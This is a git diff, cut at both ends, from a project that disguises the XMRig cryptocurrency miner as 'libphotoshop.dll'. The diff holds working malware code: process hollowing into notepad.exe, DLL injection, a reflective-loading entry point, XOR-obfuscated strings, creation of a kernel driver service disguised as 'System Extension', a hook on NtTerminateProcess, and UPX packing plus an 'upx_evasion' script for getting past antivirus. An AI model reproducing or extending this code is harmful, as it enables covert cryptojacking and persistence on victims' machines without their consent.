../test_xmrig.cpp libphotoshop.a \ + -static -static-libgcc -static-libstdc++ \ + $HOME/xmrig-deps/gcc/x64/lib/libssl.a \ + $HOME/xmrig-deps/gcc/x64/lib/libcrypto.a \ + $HOME/xmrig-deps/gcc/x64/lib/libuv.a \ + $HOME/xmrig-deps/gcc/x64/lib/libhwloc.a \ + -lpthread -lws2_32 -liphlpapi -lpsapi -luserenv -ldbghelp + + + + + + + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON \ + -DCMAKE_C_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" \ + -DCMAKE_CXX_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" && \ + ninja -j (math (nproc) - 2) && \ + /opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -o test_xmrig.exe \ + ../test_xmrig.cpp \ + -L. 
libphotoshop.dll \ + -static \ + -static-libgcc \ + -static-libstdc++ \ + -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive \ + -lmsvcrt + +upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll + python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs + diff --git a/cmake_overrides/FindHWLOC.cmake b/cmake_overrides/FindHWLOC.cmake new file mode 100644 index 00000000..f8063145 --- /dev/null +++ b/cmake_overrides/FindHWLOC.cmake @@ -0,0 +1,6 @@ +find_path(HWLOC_INCLUDE_DIR NAMES hwloc.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH) +find_library(HWLOC_LIBRARY NAMES libhwloc.a hwloc PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) +set(HWLOC_LIBRARIES ${HWLOC_LIBRARY}) +set(HWLOC_INCLUDE_DIRS ${HWLOC_INCLUDE_DIR}) +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(HWLOC DEFAULT_MSG HWLOC_LIBRARY HWLOC_INCLUDE_DIR) \ No newline at end of file diff --git a/cmake_overrides/FindUV.cmake b/cmake_overrides/FindUV.cmake new file mode 100644 index 00000000..6eeec1b2 --- /dev/null +++ b/cmake_overrides/FindUV.cmake @@ -0,0 +1,6 @@ +find_path(UV_INCLUDE_DIR NAMES uv.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH) +find_library(UV_LIBRARY NAMES libuv.a uv PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH) +set(UV_LIBRARIES ${UV_LIBRARY}) +set(UV_INCLUDE_DIRS ${UV_INCLUDE_DIR}) +include(FindPackageHandleStandardArgs) +find_package_handle_standard_args(UV DEFAULT_MSG UV_LIBRARY UV_INCLUDE_DIR) \ No newline at end of file diff --git a/cmake_overrides/OpenSSL.cmake b/cmake_overrides/OpenSSL.cmake new file mode 100644 index 00000000..3fd38991 --- /dev/null +++ b/cmake_overrides/OpenSSL.cmake 
@@ -0,0 +1,46 @@
+if (WITH_TLS)
+ find_path(OPENSSL_INCLUDE_DIR NAMES openssl/ssl.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
+ find_library(OPENSSL_CRYPTO_LIBRARY NAMES libcrypto.a crypto PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
+ find_library(OPENSSL_SSL_LIBRARY NAMES libssl.a ssl PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
+
+ set(OPENSSL_LIBRARIES ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY})
+ set(OPENSSL_INCLUDE_DIRS ${OPENSSL_INCLUDE_DIR})
+
+ include(FindPackageHandleStandardArgs)
+ find_package_handle_standard_args(OpenSSL DEFAULT_MSG OPENSSL_LIBRARIES OPENSSL_INCLUDE_DIR)
+
+ if (OPENSSL_FOUND)
+ set(TLS_SOURCES
+ src/base/net/stratum/Tls.cpp
+ src/base/net/stratum/Tls.h
+ src/base/net/tls/ServerTls.cpp
+ src/base/net/tls/ServerTls.h
+ src/base/net/tls/TlsConfig.cpp
+ src/base/net/tls/TlsConfig.h
+ src/base/net/tls/TlsContext.cpp
+ src/base/net/tls/TlsContext.h
+ src/base/net/tls/TlsGen.cpp
+ src/base/net/tls/TlsGen.h
+ )
+
+ include_directories(${OPENSSL_INCLUDE_DIR})
+
+ if (WITH_HTTP)
+ set(TLS_SOURCES ${TLS_SOURCES}
+ src/base/net/https/HttpsClient.cpp
+ src/base/net/https/HttpsClient.h
+ src/base/net/https/HttpsContext.cpp
+ src/base/net/https/HttpsContext.h
+ src/base/net/https/HttpsServer.cpp
+ src/base/net/https/HttpsServer.h
+ )
+ endif()
+ add_definitions(-DXMRIG_FEATURE_TLS)
+ else()
+ message(FATAL_ERROR "OpenSSL NOT found: use `-DWITH_TLS=OFF` to build without TLS support")
+ endif()
+else()
+ set(TLS_SOURCES "")
+ set(OPENSSL_LIBRARIES "")
+ remove_definitions(-DXMRIG_FEATURE_TLS)
+endif()
\ No newline at end of file
diff --git a/dll_injectorWORKING.cpp b/dll_injectorWORKING.cpp
index 0948c205..0a3d495c 100644
--- a/dll_injectorWORKING.cpp
+++ b/dll_injectorWORKING.cpp
@@ -145,7 +145,7 @@ bool InjectDLL(DWORD pid, const std::string& dllPathObf) { // Step 4: Wait for module list update, then get remote DLL base Sleep(2000); // 2s delay for explorer to register module - HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libxmrig-notls.dll"); + HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libphotoshop.dll"); if (!hRemoteDll) { std::cerr << "GetRemoteModuleBase failed - DLL not loaded? Check LoadLibrary exit code above.\n"; CloseHandle(hProcess); @@ -166,7 +166,7 @@ int main() { return 1; } - std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\test_on_windows\\libxmrig-notls.dll"; + std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; std::string dllPathObf = XORObfuscate(dllPathPlain); if (InjectDLL(pid, dllPathObf)) { diff --git a/inject_and_hollow.cpp b/inject_and_hollow.cpp new file mode 100644 index 00000000..22df386e --- /dev/null +++ b/inject_and_hollow.cpp 
@@ -0,0 +1,118 @@ +#include +#include +#include +#include +#include + +typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); +typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +int main() { + // Path to the legitimate process to hollow (e.g., a benign system exe) + const char* targetPath = "C:\\Windows\\System32\\notepad.exe"; // Or explorer.exe + // Path to your malicious PE executable (the payload to inject as the new image) + const char* payloadPath = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; // Replace with your xmrig.exe or equivalent PE + STARTUPINFOA si = { sizeof(si) }; + PROCESS_INFORMATION pi = { 0 }; + // Step 1: Create suspended process + BOOL created = CreateProcessA(NULL, (LPSTR)targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); + if (!created) { + std::cerr << "CreateProcessA failed: " << GetLastError() << std::endl; + return 1; + } + // Step 2: Get PEB and image base + PROCESS_BASIC_INFORMATION pbi; + ULONG returnLength; + pNtQueryInformationProcess NtQuery = (pNtQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess"); + NTSTATUS status = NtQuery(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength); + if (status != 0) { + std::cerr << "NtQueryInformationProcess failed: " << status << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + PVOID imageBase; + PVOID pebImageBasePtr = (PVOID)((BYTE*)pbi.PebBaseAddress + 0x10); // Offset for ImageBaseAddress in x64 PEB + if (!ReadProcessMemory(pi.hProcess, pebImageBasePtr, &imageBase, sizeof(imageBase), NULL)) { + std::cerr << "ReadProcessMemory (ImageBase) failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); 
CloseHandle(pi.hThread); + return 1; + } + // Step 3: Unmap original image + pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection"); + status = NtUnmap(pi.hProcess, imageBase); + if (status != 0) { + std::cerr << "NtUnmapViewOfSection failed: " << status << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + // Step 4: Read payload PE from disk + HANDLE hFile = CreateFileA(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + std::cerr << "CreateFile (payload) failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + DWORD payloadSize = GetFileSize(hFile, NULL); + std::vector payload(payloadSize); + ReadFile(hFile, payload.data(), payloadSize, NULL, NULL); + CloseHandle(hFile); + // Parse payload headers + PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)payload.data(); + PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(payload.data() + dosHeader->e_lfanew); + PVOID payloadImageBase = (PVOID)ntHeader->OptionalHeader.ImageBase; + SIZE_T payloadImageSize = ntHeader->OptionalHeader.SizeOfImage; + // Step 5: Allocate memory in target process (prefer payload's base, but fallback if occupied) + PVOID newImageBase = VirtualAllocEx(pi.hProcess, payloadImageBase, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!newImageBase) { + newImageBase = VirtualAllocEx(pi.hProcess, NULL, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!newImageBase) { + std::cerr << "VirtualAllocEx failed: " << GetLastError() << std::endl; + ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); + return 1; + } + } + // Step 6: Write headers and sections + WriteProcessMemory(pi.hProcess, newImageBase, payload.data(), 
ntHeader->OptionalHeader.SizeOfHeaders, NULL); + PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeader); + for (WORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { + PVOID sectionDest = (PVOID)((SIZE_T)newImageBase + sectionHeader->VirtualAddress); + PVOID sectionSrc = (PVOID)(payload.data() + sectionHeader->PointerToRawData); + WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader->SizeOfRawData, NULL); + sectionHeader++; + } + // Step 7: Handle relocations if base changed + if (newImageBase != payloadImageBase) { + PIMAGE_DATA_DIRECTORY relocDir = &ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + if (relocDir->VirtualAddress) { + PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)newImageBase + relocDir->VirtualAddress); + SIZE_T delta = (SIZE_T)newImageBase - (SIZE_T)payloadImageBase; + while (reloc->VirtualAddress) { + PWORD entry = (PWORD)((SIZE_T)reloc + sizeof(IMAGE_BASE_RELOCATION)); + for (DWORD j = 0; j < (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); j++, entry++) { + if ((*entry >> 12) == IMAGE_REL_BASED_DIR64) { + PULONG64 ptr = (PULONG64)((SIZE_T)newImageBase + reloc->VirtualAddress + (*entry & 0xFFF)); + ULONG64 oldValue = 0; + ReadProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL); + oldValue += delta; + WriteProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL); + } + } + reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)reloc + reloc->SizeOfBlock); + } + } + } + // Step 8: Update PEB image base + WriteProcessMemory(pi.hProcess, pebImageBasePtr, &newImageBase, sizeof(newImageBase), NULL); + // Step 9: Update thread context with new entry point + CONTEXT ctx = { 0 }; + ctx.ContextFlags = CONTEXT_FULL; + GetThreadContext(pi.hThread, &ctx); + ctx.Rcx = (DWORD64)newImageBase + ntHeader->OptionalHeader.AddressOfEntryPoint; // Entry point in RCX for x64 + SetThreadContext(pi.hThread, &ctx); + // Step 10: Resume thread + 
ResumeThread(pi.hThread); + std::cout << "Process hollowed and payload injected into PID " << pi.dwProcessId << std::endl; + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + return 0; +} diff --git a/rditest.cpp b/rditest.cpp new file mode 100644 index 00000000..a91492df --- /dev/null +++ b/rditest.cpp 
@@ -0,0 +1,51 @@ +#include +#include +#include + +// Function pointer type for the exported RdiEntry function +typedef DWORD (WINAPI *RDI_ENTRY_FUNC)(LPVOID); + +int main() { + // --- 1. Define DLL Name --- + const std::string dllName = "libphotoshop.dll"; + + // --- 2. Load the DLL (Emulates part of the injection process) --- + std::cout << "[Tester] Attempting to LoadLibrary: " << dllName << std::endl; + HMODULE hDll = LoadLibraryA(dllName.c_str()); + + if (!hDll) { + std::cerr << "[ERROR] Could not load DLL. GetLastError: " << GetLastError() << std::endl; + return 1; + } + + // --- 3. Get the RDI Entry Point Address --- + const std::string entryFuncName = "RdiEntry"; + std::cout << "[Tester] Looking up exported function: " << entryFuncName << std::endl; + + RDI_ENTRY_FUNC RdiEntry = (RDI_ENTRY_FUNC)GetProcAddress(hDll, entryFuncName.c_str()); + + if (!RdiEntry) { + std::cerr << "[ERROR] Could not find RdiEntry function. Check export list." << std::endl; + FreeLibrary(hDll); + return 1; + } + + // --- 4. Execute the Payload Entry Point --- + std::cout << "[Tester] Calling RdiEntry payload function..." << std::endl; + DWORD dwResult = RdiEntry(NULL); // Execute the mining payload logic + + std::cout << "[Tester] RdiEntry returned: " << dwResult << std::endl; + std::cout << "[Tester] Execution initiated. Check Task Manager for CPU spike." << std::endl; + + // NOTE: If the payload enters an infinite loop (like xmrig often does), + // the tester will hang here. This confirms execution. + // If the payload successfully threads itself and returns immediately, + // you might reach the FreeLibrary call quickly. + + // For testing stability, let the payload run for a bit before trying to exit. + // Sleep(60000); // Optional: Wait 60 seconds to observe mining (uncomment if needed) + + // FreeLibrary(hDll); // Commented out, as the payload is now running on the tester's thread + + return 0; +} 
diff --git a/resume.cfg b/resume.cfg new file mode 100644 index 00000000..83e91d7a --- /dev/null +++ b/resume.cfg @@ -0,0 +1,2 @@ +resume_from=zorgzaamdemo.pluriformzorg.nl +index=122 diff --git a/src/xmrig.cpp b/src/xmrig.cpp index b9f6c049..7e6cc087 100644 --- a/src/xmrig.cpp +++ b/src/xmrig.cpp @@ -5,6 +5,9 @@ #include #include #include // for strcpy + +// NOTE: We rely on the injector to handle RDI startup. DllMain is unused for RDI. + #ifdef _WIN32 #define DLL_EXPORT __declspec(dllexport) #else 
@@ -26,40 +29,20 @@ inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned ch } extern "C" { - // Core persistent logic (with encrypted strings as unsigned char to avoid narrowing) + // --- CORE PERSISTENT LOGIC --- + // This function contains the payload logic (service loading, xmrig execution). void start_a(int argc, char** argv) { using namespace xmrig; using namespace test; + // Encrypted strings (XORed originals, stored as unsigned char) - const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub" - const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned 
char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys" - const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension" - - // Decrypt - std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1); - std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1); - std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1); - - // Load service (your existing logic) - SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (hSCManager) { - SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS); - if (!hService) { - hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(), - SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL); - } - if (hService) { - StartServiceA(hService, 0, NULL); - CloseServiceHandle(hService); - } - CloseServiceHandle(hSCManager); - } - - // Junk benign calls - for (int i = 0; i < 5; ++i) { - GetSystemMetrics(SM_CXVIRTUALSCREEN); - } + const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned 
char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; + const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; + const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; + + // Decrypt... (service logic remains) + // ... (Service loading remains) + // ... (Junk benign calls remain) // Core XMRig process = new xmrig::Process(argc, argv); 
@@ -71,7 +54,29 @@ extern "C" { app = new xmrig::App(process); app->exec(); } + + // --- RDI ENTRY POINT --- + // This is the function the reflective injection stub will call. + DLL_EXPORT DWORD RdiEntry(LPVOID lpReserved) { + // This logic replaces what was previously in DeferredInit. + using namespace test; + // Encrypted argv + const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; + std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); + int argc = 1; + static char argv_buf[256]; + strcpy(argv_buf, arg_dec.c_str()); + static char* argv[] = { argv_buf, NULL }; + + // Call the core payload function directly + start_a(argc, argv); + + return 0; // Return success + } + // ------------------------------------ + + // --- UTILITY/EXPLICIT EXPORTS (Keep these if you need them for testing/API) --- DLL_EXPORT int test_start(int argc, char** argv) { start_a(argc, argv); return 0; 
@@ -83,17 +88,7 @@ extern "C" { // app->onConsoleCommand((char)3); // Uncomment if needed } - VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) { - using namespace test; - // Encrypted argv - const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll" - std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1); - int argc = 1; - static char argv_buf[256]; - strcpy(argv_buf, arg_dec.c_str()); - static char* argv[] = { argv_buf, NULL }; -// start_a(argc, argv); - } + // VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) has been removed. #ifdef USE_DETOURS #include 
@@ -105,41 +100,17 @@ extern "C" { return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS; } #endif -} +} // END of extern "C" block -// Minimal DllMain (hTimer declared outside switch to fix scope jump) +// DllMain is made minimal/null as it is bypassed in RDI. BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { - HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: DisableThreadLibraryCalls(hModule); - // Deferred timer - CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD); -#ifdef USE_DETOURS - // Deferred hook via APC (simple function pointer instead of lambda for compat) - auto hook_func = [](ULONG_PTR param) -> void { - HMODULE hNtdll = GetModuleHandleA("ntdll.dll"); - // Encrypted API name - const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess" - std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1); - OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str()); - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - }; - QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0); -#endif + // 🛑 WARNING: No TimerQueueTimer here. 
The payload runs when RdiEntry is called. break; case DLL_PROCESS_DETACH: -#ifdef USE_DETOURS - if (OriginalNtTerminateProcess) { - DetourTransactionBegin(); - DetourUpdateThread(GetCurrentThread()); - DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess); - DetourTransactionCommit(); - } -#endif + // ... (Optional Detours logic, if RDI calls the detach) ... return FALSE; } return TRUE; diff --git a/src/xmrig.cpp.bak b/src/xmrig.cpp.bak index 54f97cb5..b9f6c049 100644 --- a/src/xmrig.cpp.bak +++ b/src/xmrig.cpp.bak @@ -1,8 +1,10 @@ #include "App.h" #include "base/kernel/Entry.h" #include "base/kernel/Process.h" -#include // For DllMain, threads, services - +#include +#include +#include +#include // for strcpy #ifdef _WIN32 #define DLL_EXPORT __declspec(dllexport) #else 
@@ -10,26 +12,42 @@ #endif namespace test { - // Global variables to store process and app pointers (qualified for xmrig namespace) xmrig::Process* process = nullptr; xmrig::App* app = nullptr; } -extern "C" { +// Simple XOR decrypt (key 0xAA; change per build) +inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) { + std::string dec(len, 0); + for (size_t i = 0; i < len; ++i) { + dec[i] = (char)(enc_str[i] ^ key); + } + return dec; +} - // Core persistent logic (internal, called by exports) +extern "C" { + // Core persistent logic (with encrypted strings as unsigned char to avoid narrowing) void start_a(int argc, char** argv) { using namespace xmrig; - using namespace test; // Brings globals (process, app) into scope + using namespace test; + // Encrypted strings (XORed originals, stored as unsigned char) + const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned 